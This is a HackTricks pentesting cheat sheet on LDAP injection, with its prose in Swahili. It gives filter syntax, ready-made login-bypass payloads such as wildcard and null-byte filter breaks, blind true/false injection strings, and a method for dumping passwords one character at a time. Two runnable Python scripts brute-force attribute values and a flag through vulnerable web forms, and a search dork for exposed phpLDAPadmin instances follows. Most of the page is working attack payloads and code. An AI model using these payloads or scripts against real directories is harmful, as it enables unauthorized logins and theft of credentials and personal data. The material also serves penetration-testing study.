LDAP Injection
Reading time: 6 minutes
LDAP Injection
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
LDAP Injection
LDAP
Ikiwa unataka kujua ni nini LDAP, tembelea ukurasa ufuatao:
389, 636, 3268, 3269 - Pentesting LDAP
LDAP Injection ni shambulio linalolenga programu za wavuti ambazo zinaunda taarifa za LDAP kutoka kwa pembejeo za mtumiaji. Hii inatokea wakati programu inashindwa kusafisha pembejeo ipasavyo, ikiruhusu washambuliaji kubadilisha taarifa za LDAP kupitia proxy ya ndani, ambayo inaweza kusababisha ufikiaji usioidhinishwa au urekebishaji wa data.
Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = |filterlist
Not = ! filter
Filterlist = 1*filter
Item= simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr ”=” [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
(&) = Absolute TRUE
(|) = Absolute FALSE
Kwa mfano:
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))
Unaweza kufikia hifadhidata, na hii inaweza kuwa na taarifa za aina nyingi tofauti.
OpenLDAP: Ikiwa vichujio 2 vinakuja, inatekeleza tu cha kwanza.
ADAM au Microsoft LDS: Kwa vichujio 2 wanatoa kosa.
SunOne Directory Server 5.0: Inatekeleza vichujio vyote viwili.
Ni muhimu sana kutuma kichujio chenye sintaksia sahihi au kosa litatokea. Ni bora kutuma kichujio kimoja tu.
Kichujio kinapaswa kuanza na: &
au |
Mfano: (&(directory=val1)(folder=public))
(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void
Kisha: (&(objectClass=
*)(ObjectClass=*))
itakuwa kichujio cha kwanza (kile kinachotekelezwa).
Login Bypass
LDAP inasaidia muundo kadhaa kuhifadhi nywila: wazi, md5, smd5, sh1, sha, crypt. Hivyo, inaweza kuwa kwamba bila kujali unachoweka ndani ya nywila, inahifadhiwa.
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
Orodha
Blind LDAP Injection
Unaweza kulazimisha majibu ya False au True ili kuangalia kama kuna data yoyote inayorejeshwa na kuthibitisha uwezekano wa Blind LDAP Injection:
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
Dump data
Unaweza kurudia juu ya herufi za ascii, nambari na alama:
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=B*)) : KO
...
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
(&(sn=administrator)(password=MB*)) : KO
...
Scripts
Gundua maeneo halali ya LDAP
Vitu vya LDAP vina vyenye kwa chaguo-msingi sifa kadhaa ambazo zinaweza kutumika kuhifadhi habari. Unaweza kujaribu kuvunjavunja zote ili kupata habari hiyo. Unaweza kupata orodha ya sifa za LDAP za chaguo-msingi hapa.
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys
proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break
if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()
Special Blind LDAP Injection (bila "*")
#!/usr/bin/python3
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
Google Dorks
intitle:"phpLDAPadmin" inurl:cmd.php
More Payloads
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.